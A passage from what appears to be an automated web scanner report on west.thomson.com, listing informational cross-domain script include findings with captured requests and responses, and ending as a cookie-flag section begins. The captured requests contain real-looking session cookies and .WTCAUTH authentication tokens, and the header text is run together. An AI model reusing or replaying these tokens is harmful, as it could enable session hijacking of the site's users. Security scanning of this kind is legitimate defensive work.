HTTP/1.1 200 OK6E0DA7E316662F35CD801FB1884F55F2D184C53D0D2F4AA981F1850DC4F54B455CC740DE6A3A61A343349F17598FFF202335A75BD6FA9930A4102F07FA82899CA9DF3ECE6D45B7DFB1136EF60AAF3D1093EB92D363DEDF846159C5EEA4B2C6654B511316A827828B49D7A8F4BAA567EE0AC56D57D345784960460228A95779E1C4391520F348B9037D5ACF439811F80B15F5EFC008F6F0846F5E0EA79BF17D2624B6A8E054DB0507FE036C08288195B48FA84DF92A90D2ACAFF0CE9218C7C1D32DDD289B076CE7A75DDDCC337F829198E1CBF95448E9FD984AE5899980BD9; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... <script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]...
5.2. http://west.thomson.com/default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/default.aspx
Issue detail
The response dynamically includes the following scripts from other domains:http://media.richrelevance.com/rrserver/js/0.4/p13n.js http://tracker.marinsm.com/tracker/787f8z6077.js https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://s7.addthis.com/js/250/addthis_widget.js
Request
GET /default.aspx HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3
Response
HTTP/1.1 200 OK=0xhchh4dyhomfi1jfdhr2vqt; path=/; HttpOnlyjfdhr2vqt; path=/{6eed97b3-02ac-4505-898e-74b46a092d39}; expires=Fri, 29-Apr-2011 20:02:52 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... .com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... Navigation_placeHolderContent_RRMerch1_ctl00_placeHolderTopNavigation_placeHolderContent_RRMerch1_ctl00_placeHolderTopNavigation_placeHolderContent_RRMerch1_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]...
5.3. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/productdetail/160547/12484463/productdetail.aspx
Issue detail
The response dynamically includes the following scripts from other domains:http://media.richrelevance.com/rrserver/js/0.4/p13n.js http://tracker.marinsm.com/tracker/787f8z6077.js https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://s7.addthis.com/js/250/addthis_widget.js
Request
GET /productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK73540424741E268099E6241C09AA45A626DE2A38C22E931FE39A836ECA06504AB5E11D899AB974340AC3CA22EFA3BB0676F1C0B8373726AAD802F355075EA717D1B28441FC4F53A7328B7FD809F21298A2BB310E7B3E4873D669AB0C1DC219FC364772434FECA03988543E0C149CD8DC2D028D16CDF8B7C86EE82F6122626596B9EC5B4BD031E6A0CB5A74116B5FFAE079B9DC014893820F0EF5A0D46558FF9B020B1DB315FE28D9157A01B864D7CF4B3A9F4F24F0CF57722CEACF6E4E538CFC9886E21DFACDFB09725777C42B39CBFDE80E488D41C726AC1CBF53B9A1753; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... _R3DisplayRight_ctl00_placeHolderTopNavigation_placeHolderContent_ctl00_R3DisplayRight_ctl00_placeHolderTopNavigation_placeHolderContent_ctl00_R3DisplayRight_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]...
5.4. http://west.thomson.com/store/secure/ShoppingBasket.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/store/secure/ShoppingBasket.aspx
Issue detail
The response dynamically includes the following scripts from other domains:http://media.richrelevance.com/rrserver/js/0.4/p13n.js http://tracker.marinsm.com/tracker/787f8z6077.js https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://s7.addthis.com/js/250/addthis_widget.js
Request
GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1
Response
HTTP/1.1 200 OK767F208B345EAA979222AFB75B1D39D5072C8AC8163224D602E4EA0791659ECC40EAA04995AD2414A1EF63E920C2406A52D5A77C772B7312571F0AAC96B34372DB47CEF38803A8D2B7154B70F6215558C4BE194B8F6631FFDBEECF7D4256904225BA30EA921CF83C914FF8CF103200841FE605F66B636573E74A9FE11E39E665181B5E833711454838B5B5EDDAB8E52F237C0742B8087456FDD46A9875A0BD3BE7D68841EDA7A916AA72ACAB0B687055A7BCB2C0B64F0382E8FCCEA3EEE09697283C17C482DF2DE2D55F26A8BD1E5F9CC9D2F12F213FCC63F2AE7AFD0ECCE; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... avigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]...
5.5. http://west.thomson.com/support/contact-us/default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/support/contact-us/default.aspx
Issue detail
The response dynamically includes the following scripts from other domains:http://media.richrelevance.com/rrserver/js/0.4/p13n.js http://tracker.marinsm.com/tracker/787f8z6077.js https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://s7.addthis.com/js/250/addthis_widget.js
Request
GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK614D9A098CCCF9C0F29D3204EE9663C01D51E95CD9C592CDADB23A34786B30EBABB2390E7FEA51BBE62180DADFAF255CA8AB719509015068D68C8075FE6A23F095DF549827C80033255DA36E699502293674B6D668FCAE278ADD04138D880C6A3F40E0EDE98A77853F1F1B45413E1BE2A34BEE937DCCCDA776CE1ABCED0F26FB69F2755769BB874466A73E9A83CADFE53A93539D3BD0332C48F697F141BAC00E38E27C2938518BE9D5C9648C952E2BEF872DC06486975DC27BFACFEF36294DEAF331A255D5995D5F54EF39A2AFCD97B20A7D318572959553AEEC610017BD6; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... .com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... <script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]...
5.6. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/Promotions/EmailPreferences/Login.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://media.richrelevance.com/rrserver/js/0.4/p13n.js https://s7.addthis.com/js/250/addthis_widget.js https://tracker.marinsm.com/tracker/787f8z6077.js
Request
GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .thomson.com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... <script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]...
5.7. https://west.thomson.com/store/secure/EmptyBasket.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/EmptyBasket.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://media.richrelevance.com/rrserver/js/0.4/p13n.js https://s7.addthis.com/js/250/addthis_widget.js https://tracker.marinsm.com/tracker/787f8z6077.js
Request
GET /store/secure/EmptyBasket.aspx HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=0D1C43F14C3D0360D4C56BDD0D49E3A1E347C13F76ADC1B282235271457FAC648FB37FE6B223762A24E6CB268609BC8463ECB71442613CE6C286443DD8C796AD188F8568D73785118A509021BEABBD4E55D10E5F1E3A4F4A3F1B558AB2332C44A56F489B0571AEA92276AE792D9D8761A0FBB7322D072015D4B719941EFD8FCB5CDB63E1CEF01EF859C876D1DA920B7EB3539BA4B4D934B5A3CF2F56BB805BA3F3435E9F173B50A3D9F7C34D0C8E7180A2F74BC8118F96769794F6D4C7A36DCE92EEA8FE38E72E95AF86A85ADB9338C9E73EDA3652910D79D1A7D57B6EF7422F00DB82A9
Response
HTTP/1.1 200 OK459338884A46B49D0105C145D63087A0F6EA1AF1008AF8F10A6BE20B4B11D124F705A3B3E14AC22EC73DD213F5F9EEB5214BC1762EE7929A0F454C61A0BDCF1DEC78E1A8885681779E756F6C33BB53E5D00DC20A327C71B7A18A01CD2DEC0CB430995B2D528EAE5EDE656A06490C12141D8DC1BDB52EA377E9C528F52835D9BB8C6526E44BC00F17481EEE8BAF4CEFD033D588FC1950953DF71D7BEC464ACA7CC296D962C2F89E8B7BF9E2164F2A2485B2AD03B442B72330D47CEE8F0DEFDB9FFFF7F71AE584B4FEA6F98140E539AF54249B185FB8811D025A5E2F4D81C75; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .thomson.com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... <script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]...
5.8. https://west.thomson.com/store/secure/ShippingInfo.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/ShippingInfo.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://media.richrelevance.com/rrserver/js/0.4/p13n.js https://s7.addthis.com/js/250/addthis_widget.js https://tracker.marinsm.com/tracker/787f8z6077.js
Request
GET /store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=9DFF38C2ED245A836B638A4FD2BB05048EFDFD2A3F3BC8DC4D0876357DAC06B163234E108A8F0DA6FFB919F8831205FF1893BF274F77770E9447A6CF6832F99911CAEA4F06343A555BDF7037EBDAD0392A3B821D6A252C115D9D10A1FD2B10DE395F8581D4BBE49B8B4EF6A088A00BE982BA5CBAAC1C23CD6D40E8E10C4A8CB90101D3CE531D7618D4A99EC6ED09D86A6A87BEB92C84EBB5541C5F4267CA16C317ED73CD9AD52E9BCFFCFA39E7A4F7561999EF701967F4FAEE3513AC9E115F783D6CA97286E2B3D06563DA39F267FA170B8C51C76EEB06DDD6F99A112D49B9ED48435EDE
Response
HTTP/1.1 200 OKBBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .thomson.com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... <script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]...
5.9. https://west.thomson.com/support/customer-service/order-info.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/support/customer-service/order-info.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://media.richrelevance.com/rrserver/js/0.4/p13n.js https://s7.addthis.com/js/250/addthis_widget.js https://tracker.marinsm.com/tracker/787f8z6077.js
Request
GET /support/customer-service/order-info.aspx HTTP/1.1/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA
Response
HTTP/1.1 200 OK96EC21459B14B79587A583EC2F9BC37D2E75B5317EF0E65FAFEF6730683DB17DCF2BE06F0B1B98854DE5A707FC465E78510565D9EB9DAE71D857891B9157BA899B658EA734F816E3CE32760B05F6B24F34F4DF7A20D01665DF7E18DCAAC70E57C6EDF44A0197593C73CA0FAE6C559214D35FC361C5715FE43DBF19C70EBD085C78E9E5F286FC92ED8B559596ABC60CEFF4372C361E9E899AF7753D44DE2EF1A434F6907AE0EEE63371718A38CBFF23D5698B65E6F218C4AEADA2868A458441D2D6450C6DDD153EDB3A2CE7A069305EEEB72793F81C52FB84EB011536FEF0B; expires=Tue, 26-Apr-2011 21:13:49 GMT; path=/; HttpOnly7E664484BBE7EC8277401DE5ADF5C5AEAF45D558739ADCD8069717EDC476F9611DA2668E59CB60B963048A7292391B9104F44FFCFB680230472EE9A68B087279430B80A9137BCF51FCBBE8CAA2B5135B21DAB33E2FF00B71448413EC9C7D9166F621CB8C527C88854A6B0E4DFD5CD34D4666CDACDA3442EF9704AA677452920C07B5940C397045601366D36704513C6FE9B69419D140474085B16735382FEB803D48FC173BBAFD3334424BF0894189520BF2901A304307E3DC9E63E08D54BB0A62CFE50A8B440B11838DBAA606EC4F2C964E593D9C23819FB20FA690F28E5; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... .thomson.com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... <script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]...
6. Cookie without HttpOnly flag set
previous
next
There are 16 instances of this issue:
Issue background
